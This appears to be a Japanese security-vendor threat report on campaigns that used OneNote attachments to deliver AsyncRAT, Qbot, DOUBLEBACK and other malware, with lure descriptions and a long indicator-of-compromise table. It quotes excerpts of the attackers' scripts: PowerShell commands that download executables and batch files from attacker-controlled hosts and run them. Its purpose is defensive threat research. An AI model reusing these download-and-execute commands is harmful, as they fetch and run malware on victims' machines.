OneNoteファイルがマルウェア配信に使われるケースが増加

Share with your network!

主な調査結果:

  • Microsoft OneNote ファイルを利用して、電子メールでマルウェアを配信する事例が増加しています。
  • 複数のサイバー犯罪者が、OneNoteドキュメントを利用してマルウェアを配信しています。
  • 特定の業界をターゲットにした攻撃キャンペーンもありますが、多くは幅広いターゲットを対象とし、数千のメッセージに及ぶものもあります。
  • ペイロードを実行させるためには、エンドユーザがOneNote文書にアクセスする必要があります。 
  • この攻撃キャンペーンは、北米やヨーロッパ、日本を含む世界中の組織に影響を及ぼしています。
  • TA577は、1カ月間の活動休止から復帰し、2023年1月末にOneNoteを使用してQbotの配信を開始しました。

概要

プルーフポイントのリサーチャーは最近、2022年12月と2023年1月に、攻撃者がOneNoteファイルを使用して、無防備なエンドユーザーに電子メールでマルウェアを配信する事例が増加していることを確認しました。OneNoteは、Microsoftが作成したデジタルノートブックで、Microsoft 365製品スイートで利用できます。プルーフポイントは、攻撃者が電子メールの添付ファイルやURLを介して、拡張子が.oneのOneNoteドキュメントを介してマルウェアを配信していることを確認しています。

プルーフポイントは、2022年12月に、OneNoteの添付ファイルを使用してAsyncRATマルウェアを配信する6つのキャンペーンを観測しています。2023年1月には、AsyncRAT、Redline、AgentTesla、DOUBLEBACKなど、さまざまなペイロードのマルウェアを送り込む50以上のOneNoteキャンペーンをプルーフポイントは観測しています。特に、初期アクセスブローカーであるTA577は、2023年1月末にOneNote文書を使用してQbotを配信するようになりました。キャンペーンには複数の送信者と件名が含まれ、キャンペーンによってターゲティングやボリュームが異なっていました。

OneNoteを利用してマルウェアを配信するキャンペーンは増加していますが、その利用は異例です。過去の攻撃キャンペーンの特徴を観察した結果、脅威の検知を回避するために様々な種類の添付ファイルを実験した結果、攻撃者がOneNoteを採用することが多くなったと考えられます。マイクロソフトが2022年にマクロをデフォルトでブロックし始めて以来、攻撃者は、仮想ハードディスク(VHD)、コンパイル済みHTML(CHM)、そして今回のOneNote(.one)といったこれまであまり観測されなかったファイルタイプの使用を含む多くの新しい戦術、技術、手順(TTP)を実験してきました。

この手法は、今のところ有効かもしれません。分析時点では、Proofpointが観測した複数のOneNoteマルウェアサンプルは、VirusTotal上の多数のアンチウイルスベンダーによって検出されていません。プルーフポイントは、現時点では、この活動を特定の攻撃グループにアトリビューションしていませんが、これらの活動クラスターを引き続き評価します。

 

攻撃キャンペーンの詳細

OneNoteを利用してマルウェアを配信しているメールキャンペーンには、共通した特徴があります。メッセージの題名や送信者は様々ですが、ほぼすべての攻撃キャンペーンで独自のメッセージを使用してマルウェアが配信されており、通常、スレッドハイジャックは利用されていません。メッセージには通常、請求書、送金、配送などのテーマや、クリスマスボーナスなどの季節のテーマなど、OneNoteのファイルが添付されています。2023年1月中旬、プルーフポイントの研究者は、マルウェアの実行に同じTTPを使用するOneNoteの添付ファイルを配信するためにURLを使用する攻撃を観測しました。これには、2023年1月31日に観測されたTA577キャンペーンが含まれます。

OneNoteの文書にはファイルが埋め込まれており、多くの場合、ボタンのようなグラフィックの後ろに隠されています。ユーザーが埋め込まれたファイルをダブルクリックすると、警告が表示されます。ユーザーが続行をクリックすると、そのファイルが実行されます。ファイルは、さまざまな種類の実行ファイル、ショートカット(LNK)ファイル、またはHTMLアプリケーション(HTA)やWindowsスクリプトファイル(WSF)のようなスクリプトファイルである可能性があります。

2022年12月から2023年1月31日の間に、OneNoteの添付ファイルを使用するキャンペーンが大幅に増加しました。さらに、Proofpointが12月に観測したOneNoteキャンペーンはAsyncRATの配信のみでしたが、リサーチャーは2023年1月にOneNoteの添付ファイルを介して配信される7つの追加マルウェアのペイロードを観測しています。Redline、AgentTesla、Quasar RAT、XWorm、Netwire、DOUBLEBACK、およびQbotです。このキャンペーンは、北米やヨーロッパを含む世界中の組織を標的としていました。

onenote campaigns

図1:2022年12月から2023年1月31日までのOneNoteキャンペーン数、およびマルウェアの種類に応じたOneNoteキャンペーンの総数

攻撃キャンペーンの総数が増加し、ペイロードの種類も多様化していることから、さまざまなレベルの複数の攻撃グループが OneNote を利用していることがうかがえます。いくつかのクラスターは、コマンド&コントロール(C2)、ルアー、およびターゲティングに基づいて関連しているように見えますが、ほとんどのキャンペーンは、異なるインフラ、メッセージおよびルアーのテーマ、およびターゲティングを使用しています。追跡可能な攻撃グループであるTA577にアトリビューションすることができた攻撃キャンペーンは1つだけでした。

 

2022年12月の攻撃キャンペーン

2022年12月の2件の攻撃キャンペーンでは、航空宇宙関連企業を装った送信者が登場し、機械部品や仕様書に関連する名称の添付ファイルが含まれていました。メッセージには、PowerShellスクリプトを呼び出してURLから実行ファイル(Excel.exeなど)をダウンロードさせるHTAファイルを含むOneNoteの添付ファイルが含まれていました。これらのメッセージは、製造業や産業界の企業を標的としていました。

lure spoofing

図2: TP Aerospace社を騙ったOneNoteのルアー(おとり文書)

スクリプト(一部を抜粋):

oShell.Run "cmd /c powershell Invoke-WebRequest -Uri hxxp[:]3.101.39[.]145/TPAEROSPACE.one -OutFile $env:tmp\kp.one; PowerShell Start-Process -Filepath $env:tmp\kp.one; Start-Sleep -Seconds 1  " & DontShowWindow, WaitUntilFinished

oShell.Run "cmd /c powershell Invoke-WebRequest -Uri hxxp[:]3.101.39[.]145/Excel.exe -OutFile $env:tmp\system32.exe; PowerShell Start-Process -Filepath $env:tmp\system32.exe; Start-Sleep -Seconds 1   " & DontShowWindow, WaitUntilFinished

また、「クリスマス・ボーナス」や「クリスマス・ギフト」などのテーマを用いた、教育機関などを主なターゲットとした攻撃キャンペーンも行われました。例えば、下図のように、ある攻撃キャンペーンは、顧客に特別なプレゼントを提供すると称して、大手消費者ブランドになりすましたものでした。この攻撃キャンペーンでは、特に教育分野のユーザーを主なターゲットとした数千のメッセージが含まれていました。

christmas themed lure

図3:クリスマスプレゼントをテーマにしたルアーには、AsyncRATを配信するためのOneNoteの添付ファイルが含まれる

これらの攻撃キャンペーンは、上記と同じTTPを使用しており、PowerShellを使用してURLからAsyncRATペイロードをダウンロードするOneNoteの添付ファイルを配信していました。

 

2023年1月の攻撃キャンペーン

プルーフポイントは、2023年1月1日から31日にかけて、OneNoteの添付ファイルを利用した50以上のキャンペーンを観測しています。これらのキャンペーンは通常、数千のメッセージを含み、特定の組織や業種をターゲットにしていませんでした。これらの攻撃キャンペーンでは、最終的にマルウェアのペイロードをダウンロードさせるために、OneNoteの添付ファイルに隠された埋め込みファイルを使用するという、同じTTPが継続的に使用されています。また、複数のキャンペーンにおいて、ペイロードをホストするために、正規のサービス「OneNote Gem」と「Transfer.sh」が使用されています。2023年1月19日、プルーフポイントは、XWormおよびDOUBLEBACKのペイロードにつながるOneNoteの添付ファイルを配信するためのURLを使用した2つのキャンペーンを確認しました。

ほぼすべてのキャンペーンで、配送、請求書、税金、またはその他の一般的なビジネス関連のテーマが含まれていました。12月から1月初旬にかけてAsyncRATのペイロードのみを観測した後、リサーチャーは、2023年1月9日にAsyncRATとともにQuasarRATおよびXWormマルウェアの攻撃キャンペーンを観測しています。RedlineとAgentTeslaは2023年1月11日に、Netwireは2023年1月12日に初めて観測されました。Proofpointのリサーチャーが調査したOneNoteドキュメントのいくつかにはファイル履歴が含まれており、同じ攻撃者がファイルを再利用し、ペイロードのURLを置き換えて新しいファイルを作成していることが分かります。

ほとんどのキャンペーンは英語で行われていますが、研究者は、XWormとAsyncRATを配信する請求書テーマを使用し、英語とフランス語の両方の言語をルアーに含むキャンペーンを1つ確認しました。メッセージには、URLからバッチファイル(system32.bat)をダウンロードするためのPowerShellスクリプトを含むOneNoteの添付ファイルが含まれていました。

XWorm and AsyncRAT

図4:英語とフランス語のメッセージを含む請求書のテーマを使用してXWormとAsyncRATペイロードを配信するマルウェアキャンペーン

スクリプト(一部を抜粋)

ExecuteCmdAsync "cmd /c powershell Invoke-WebRequest -Uri hxxps[:]stnicholaschurch[.]ca/Invoice.one -OutFile $env:tmp\invoice.one; Start-Process -Filepath $env:tmp\invoice.one"

ExecuteCmdAsync "cmd /c powershell Invoke-WebRequest -Uri hxxps[:]stnicholaschurch[.]ca/Cardlock_341121.bat -OutFile $env:tmp\system32.bat; Start-Process -Filepath $env:tmp\system32.bat"

注目すべきは、2023年1月19日に、プルーフポイントのリサーチャーが、DOUBLEBACKバックドアを配布する少量キャンペーンを観測したことです。DOUBLEBACKは、ホストおよびネットワークの偵察、データ窃取、後続のペイロードを可能にするインメモリバックドアです。DOUBLEBACKは、以前、TA579によって使用されていました。これは、スレッドハイジャックを使用したOneNoteのキャンペーンとして初めて観測されたものです。メッセージには、/download/[guid]で終わるURIを持つ複数のドメイン上のURLが含まれていました。この攻撃者は、以前に被害者と連絡を取り、関連するファイルがクラウドストレージにアップロードされたことを装っています。このURLは、同名のOneNoteを含むZIPファイル(例:4752-23 Order Confirmation.zip)のダウンロードに誘導していました。

DOUBLEBACK

図5:DOUBLEBACKのルアーとOneNoteの添付ファイル

OneNoteを開くと、テンプレートは被害者に「ダブルクリックでファイルを表示する」ように助言します。被害者がこれを実行すると、OneNoteはボタンの後ろに埋め込まれたVBSファイル(例:JnNNj3.vbs)を実行しようと試みます。被害者はまず、添付ファイルを開くことに関するセキュリティリスクについて促されます。被害者が続行すると、VBSは完全に実行されます。このVBSは、DOUBLEBACKを実行するためのPowerShellスクリプトをダウンロードするものです。プルーフポイントは、類似のTTPを使用した他のDOUBLEBACKキャンペーンを観測しており、このキャンペーンが追跡可能な攻撃グループのものであるとはアトリビューションがされていません。

初期アクセスブローカーであるTA577は、2023年1月31日に1カ月間の活動休止から復帰し、OneNoteを含む攻撃チェーンでQbotを配信しました。電子メールは、以前の会話に対する返信のように見え、電子メール本文に固有のURLを含んでいました。

onenote document lure

図6:TA577が使用したOneNoteのドキュメントルアー

このURLは、Zip圧縮されたOneNoteファイルのダウンロードにつながるものでした。OneNoteを開くと、テンプレートは「開くをダブルクリックする」よう被害者に助言していました。グラフィックの下には、attachment.htaという名前の添付ファイルがありました(ただし、拡張子は非表示)。被害者がこのファイルをダブルクリックし、セキュリティプロンプトを確認すると、リモートURLからファイルをダウンロードし、偽のエラーメッセージを表示するJavaScriptコードが実行されました。HTAは「curl.exe」を使ってQbotのDLLをダウンロードし、「Wind」という関数でそれを実行します。

2022年12月のキャンペーンには、よりカスタマイズされた標的型のメッセージやテーマが含まれていましたが、2023年1月に観測されたマルウェアキャンペーンは、より一般的で広範な標的型のキャンペーンでした。プルーフポイントは、この攻撃をどの攻撃グループにもアトリビューションすることはできていません。

 

OSINTアセスメント

Proofpointのリサーチャーは、攻撃キャンペーンで観測された複数のアーティファクトを、ユーザーMREXwに関連するGitHubリポジトリに関連付けました。これには、ペイロードドメイン「direct-trojan[.]com」とバッチファイル暗号化技術が含まれています。リサーチャーは、ドメインのホストと連絡を取り、このドメインが悪質であることをユーザーに警告しています。

 

結論

プルーフポイントでは、OneNoteの添付ファイルがマルウェアの配信に使用されていることを確認する機会が増えています。当社の調査によると、複数の攻撃グループが脅威の検出を回避するためにOneNoteの添付ファイルを使用していると考えられます。TA577がOneNoteを採用したことは、より洗練された他の攻撃グループがこの手法を間もなく使い始めることを示唆しています。これは重要なことです。TA577は、ランサムウェアを含む追加的なマルウェアの後続感染を促進する初期アクセスブローカーです。オープンソースのマルウェアレポジトリのデータによると、最初に観測された添付ファイルは、複数のアンチウイルスエンジンによって悪意あるものとして検出されなかったため、メールがブロックされなかった場合、最初のキャンペーンは高い有効率を示したと考えられます(Proofpointのお客様は、メッセージが悪意あるものと判断され保護されました)。今後、OneNoteの添付ファイルを利用してマルウェアを配信する脅威者が増えることが予想されます。

ここで重要なのは、受信者が添付ファイルにアクセスした場合、つまり、埋め込まれたファイルをクリックし、OneNoteが表示する警告メッセージを無視した場合にのみ、攻撃が成功することです。組織は、この手法についてエンドユーザーを教育し、疑わしい電子メールや添付ファイルを報告するようユーザーに奨励する必要があります。

IoC(Indicators of Compromise / 侵害の痕跡) のサンプル

Indicator

Description

First Seen

hxxps[:]files.catbox[.]moe/rltrtq.bat

AsyncRAT Payload URL

19 December 2022

209.126.83[.]213

AsyncRAT C2

19 December 2022

e5a33b42b71f8ac1a5371888d11a0066b49a7f0c25fe74857fa07fb0c9bdff27

OneNote Attachment SHA256

19 December 2022

43f4eaefc6e71f8d30b2e3749475af51ce4d6740546706113cc4785b4410a14c

OneNote Attachment SHA256

19 December 2022

hxxp[:]3.101.39[.]145/Excel.exe

AsyncRAT Payload URL

19 December 2022

hxxp[:]3.101.39[.]145/TPAEROSPACE.one

AsyncRAT Payload URL

19 December 2022

6a1bac8fbb30f4b98da7f7ac190fb971bf91d15b41748bc63fd9cbddb96ef189

OneNote Attachment SHA256

19 December 2022

hxxp[:]54.151.95[.]132/Access.one

AsyncRAT Payload URL

13 December 2022

hxxp[:]54.151.95[.]132/ExcelSheel.vbs

AsyncRAT Payload URL

13 December 2022

2283c3be89eb6cbf0e1579a6e398a5d1f81a50793fcca22fbc6cbdab53dc2d31

OneNote Attachment SHA256

19 December 2022

hxxps[:]www.onenotegem[.]com/uploads/soft/one-templates/four-quadrant.one

AsyncRAT Payload URL

23 December 2022

hxxps[:]transfer[.]sh/get/TScdAm/AsyncClient.bat

AsyncRAT Payload URL

23 December 2022

209.126.83[.]213

AsyncRAT C2

23 December 2022

75819879049e80de6376f146430e63a53fc4291d21f3db930ea872b82d07c77a

OneNote Attachment SHA256

23 December 2022

hxxp[:]www.onenotegem[.]com/uploads/soft/one-templates/the_daily_schedule.one

AsyncRAT Payload URL

04 January 2023

hxxps[:]depotejarat[.]ir/voicemail.bat

AsyncRAT Payload URL

04 January 2023

hxxps[:]zaminkaran[.]ir/new.png

AsyncRAT Payload URL

04 January 2023

73dc35d1fa8d1e3147a5fe6056e01f89847441ec46175ba60b24a56b7fbdf2f9

OneNote Attachment SHA256

04 January 2023

hxxps[:]www.onenotegem[.]com/uploads/soft/one-templates/the_daily_schedule.one

AsyncRAT Payload URL

05 January 2023

hxxps[:]transfer[.]sh/get/Pcj58k/AsyncClient.bat

AsyncRAT Payload URL

05 January 2023

154.12.234[.]207

AsyncRAT C2

05 January 2023

newtryex.ddns[.]net

AsyncRAT C2

05 January 2023

8276104d8d47def986063b8fbafd82ad5f4cd23862ff9ede1231cefb35115a1b

OneNote Attachment SHA256

05 January 2023

hxxps[:]onenotegem[.]com/uploads/soft/one-templates/weekly_assignments.one

AsyncRAT Payload URL

07 January 2023

hxxps[:]transfer[.]sh/rMitxs/Invoice212.bat

AsyncRAT Payload URL

07 January 2023

45.133.174[.]122

AsyncRAT C2

07 January 2023

e2b70c8552b38a6b8722d614254202c346190c6a187984a4450223eb536aaf4b

OneNote Attachment SHA256

07 January 2023

ef5a7fc0c2a301b57f0723af97faea37374b91eb3b72d8ca6ffc09a095998bb2

OneNote Attachment SHA256

07 January 2023

66c045eb61f2e589b1e27db284c9c518e5d0e87dcff25b096eede7047f7dd207

OneNote Attachment SHA256

07 January 2023

hxxps[:]transfer.sh/get/cOrt9R/me.bat

QuasarRAT Payload URL

09 January 2023

154.12.234[.]207

QuasarRAT C2

09 January 2023

c59f95d9c9ff830d33fb73c2a8b0ee8be6619b6823fc23210600b9fa88a8c9d4

OneNote Attachment SHA256

09 January 2023

hxxps[:]stnicholaschurch[.]ca/DCyaz.bat

AsyncRAT Payload URL

09 January 2023

winery.nsupdate[.]info

AsyncRAT C2

09 January 2023

c8e326756cc1f95ff51ffe26471df16f4131fdbca2ed14f8c8d14e21010058b9

OneNote Attachment SHA256

09 January 2023

hxxps[:]www.onenotegem[.]com/uploads/soft/one-templates/notes_to_do_list.one

AsyncRAT Payload URL

09 January 2023

hxxps[:]transfer[.]sh/get/5dLEvB/sky.bat

AsyncRAT Payload URL

09 January 2023

154.12.250[.]38

AsyncRAT C2

09 January 2023

15212428deeeabcd5b11a1b8383c654476a3ea1b19b804e4aca606fac285387f

OneNote Attachment SHA256

09 January 2023

hxxps[:]stnicholaschurch[.]ca/Cardlock_341121.bat

AsyncRAT Payload URL

09 January 2023

hxxps[:]stnicholaschurch[.]ca/xw.bat

XWorm Payload URL

09 January 2023

su1d.nerdpol[.]ovh

AsyncRAT and XWorm C2

09 January 2023

222b1a425f75fc7998a0bbabd52277cd82bb5ec50b75f4fb67568b3b754f5406

OneNote Attachment SHA256

09 January 2023

377fe4e55b6dde063c15c41389f3bb5aacf95443874bdcc0d02a44d6bd793780

OneNote Attachment SHA256

09 January 2023

bdc52f8983b7f034e86d1628efab5faf974e8c33ea9c3bcab0fd09ca462f8322

OneNote Attachment SHA256

09 January 2023

de30f2ba2d8916db5ce398ed580714e2a8e75376f31dc346b0e3c898ee0ae4cf

OneNote Attachment SHA256

09 January 2023

a5ae1b866c5d8a7b3eb8427e686cf5d0264b809ed4491b47346542bf69caab65

OneNote Attachment SHA256

09 January 2023

hxxps[:]transfer[.]sh/get/7msVcM/FRESHME.bat

AsyncRAT Payload URL

10 January 2023

hxxps[:]transfer[.]sh/IGu2K2/INV.bat

AsyncRAT Payload URL

10 January 2023

newtryex.ddns[.]net

AsyncRAT C2

10 January 2023

a748f4e526c1a5fed7e57887ef951e451236ee3ad39cf6161d18e5c2230aca0b

OneNote Attachment SHA256

10 January 2023

adb237144a52fc610984bd5ae8501271c5eef8ff49eff0a9d02adf4a5e36ad3b

OneNote Attachment SHA256

10 January 2023

hxxps[:]direct-trojan[.]com/file/b685b9/New%20Section%201.one

Redline Payload URL

11 January 2023

hxxps[:]direct-trojan[.]com/file/05df70/remlog.bat

Redline Payload URL

11 January 2023

172.245.45[.]213

Redline C2

11 January 2023

dfb8ba6c2ac264ac73f6d2c440d2c0744c043f1d8435bb798fef5380a649fc4e

OneNote Attachment SHA256

11 January 2023

hxxps[:]direct-trojan[.]com/file/3c6f73/software-update.exe

AgentTesla Payload URL

11 January 2023

ftp://ftp.mgcpakistan[.]com/

AgentTesla C2

11 January 2023

e1d34ad42938a777d80f3ee4c206de14021f13ab79600168b85894fdb0867b3e

OneNote Attachment SHA256

11 January 2023

hxxp[:]198.23.172[.]90/new.exe

Netwire Payload URL

12 January 2023

hxxp[:]198.23.172[.]90/template.one

Netwire Payload URL

12 January 2023

212.193.30[.]230:3345

Netwire C2

12 January 2023

328a12fdd6b485362befb392925282451d65aa23482584a49dd5b0e126218df7

OneNote Attachment SHA256

12 January 2023

hxxp[:]179.43.187[.]241/Downloads/Newsharedfilesnow.pdf.lnk

Redline Payload URL

12 January 2023

hxxps[:]transfer[.]sh/get/UaTsxp/Newsharedfilesnow.hta

Redline Payload URL

12 January 2023

109.107.179[.]248:80

Redline C2

12 January 2023

0ff4aa2eb1cd681e3b77348af935bcfc56f4b7cae48bcd826000b7ff2b82b671

OneNote Attachment SHA256

12 January 2023

plax.duckdns[.]org

AsyncRAT C2

13 January 2023

212.193.30[.]230

Netwire C2

14 January 2023

hxxp[:]198.23.172[.]90/templa.one

Netwire Payload URL

14 January 2023

hxxp[:]198.23.172[.]90/comment.exe

Netwire Payload URL

14 January 2023

0b0c70ee1612139cf7a83847cca805689aec9fbcc587a7ef8f26aa4fb9e71295

OneNote Attachment SHA256

14 January 2023

209.126.2[.]34

AsyncRAT C2

15 January 2023

hxxps[:]transfer[.]sh/get/p29ViK/tpee.bat

AsyncRAT Payload URL

15 January 2023

1791dd7a7c7d0688fac3626d57221ada157c57572cf9ed46ad4cab3d28dbaf91

OneNote Attachment SHA256

15 January 2023

hxxps[:]files.catbox[.]moe/nvz0g1.ps1

Quasar RAT Payload URL

16 January 2023

95.216.102[.]32

Quasar RAT C2

16 January 2023

ghcc.duckdns[.]org

Quasar RAT C2

16 January 2023

9bf99fc32dc69f213812c3c747e8dd41fef63ad0fd0aec01a6b399aeb10a166a

OneNote Attachment SHA256

16 January 2023

hxxps[:]barricks[.]org/admin10/client.php

DOUBLEBACK C2

19 January 2023

hxxp[:]kanaskanas[.]com/fw435tv345t.ps1

DOUBLEBACK VBS Payload

19 January 2023

hxxps[:]codezian[.]com/Nt57/300123.gif

Qbot HTA Payload URL

31 January 2023

https[:]myvigyan[.]com/m1YPt/300123.gif

Qbot HTA Payload URL

31 January 2023